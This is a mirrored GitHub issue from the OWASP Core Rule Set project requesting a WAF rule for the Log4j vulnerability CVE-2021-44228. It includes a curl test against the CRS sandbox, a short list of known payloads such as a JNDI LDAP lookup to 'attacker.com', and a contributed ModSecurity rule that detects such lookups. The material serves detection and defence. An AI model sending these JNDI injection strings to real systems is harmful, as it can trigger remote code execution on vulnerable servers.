Stuck on an issue?

Lightrun Answers was designed to reduce the constant googling that comes with debugging 3rd party libraries. It collects links to all the places you might be looking at while hunting down a tough bug.

And, if you’re still stuck at the end, we’re happy to hop on a call to see how we can help out.

Rule against CVE-2021-44228

See original GitHub issue

Motivation

A thread was started in #2330 regarding the Log4J CVE. This issue is to track the request for a specialized rule for it. Currently it is blocked with the following result:

$ curl -H "x-format-output: txt-matched-rules" -H "x-crs-version: 3.3.2" \
--data 'foo=${jndi:ldap://attacker.com/a}' \
https://sandbox.coreruleset.org/
932130 PL1 Remote Command Execution: Unix Shell Expression Found
949110 PL1 Inbound Anomaly Score Exceeded (Total Score: 5)

Proposed solution

Maybe create a specific rule to block log4j Formatting Type payloads

Alternatives

Additional context

Known Payloads:

${java:vm}
${jndi:ldap://attacker.com/a}

https://www.lunasec.io/docs/blog/log4j-zero-day/#exploit-steps https://www.techtimes.com/articles/269208/20211210/minecraft-vulnerability-spotted-how-to-fix-log4j-bug.htm https://www.cve.org/CVERecord?id=CVE-2021-44228

Issue Analytics

State:
Created 2 years ago
Reactions:4
Comments:39 (27 by maintainers)

Top GitHub Comments

9reactions

dune73commented, Dec 13, 2021

New blog post about CRS and this vulnerability:

https://coreruleset.org/20211213/crs-and-log4j-log4shell-cve-2021-44228/

8reactions

dune73commented, Dec 10, 2021

Got this as a contribution from a commercial integrator.

SecRule
REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@*  \
    "@rx \${jndi:(?:ldap|iiop|rmi)://}" \
    "id:CVE_202144228,\
    phase:2,\
    block,\
    t:none,t:lowercase,t:urlDecodeUni,\
    multimatch,\
    log,\
    msg:'Remote Command Execution: Log4j CVE-2021-44228', \
    logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\
    tag:'application-multi',\
    tag:'language-java',\
    tag:'platform-multi',\
    tag:'attack-rce',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/137/6',\
    tag:'PCI/6.5.2',\
    tag:'paranoia-level/1',\
    ver:'OWASP_CRS/3.3.x',\
    severity:'CRITICAL',\
    setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

Top Results From Across the Web

CVE-2021-44228 - Log4j RCE 0-day mitigation

A zero-day exploit affecting the popular Apache Log4j utility (CVE-2021-44228) was made public on December 9, 2021 that results in remote ...

CVE-2021-44228

An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution...

CVE-2021-44228: Apache Log4j2 Zero-Day Exploited in the ...

An exploit for a critical zero-day vulnerability affecting Apache Log4j2 known as Log4Shell was disclosed on December 9, 2021.

Exploiting, Mitigating, and Detecting CVE-2021-44228: Log4j ...

The CVE-2021-44228 is a CRITICAL vulnerability that allows attackers to execute arbitrary code on a machine. Updating log4j to 2.16.0.

CVE-2021-44228: Proof-of-Concept for Critical Apache Log4j ...

The first PoC for CVE-2021-44228 was released on December 9 prior to ... due to firewall rules or interference from other security devices....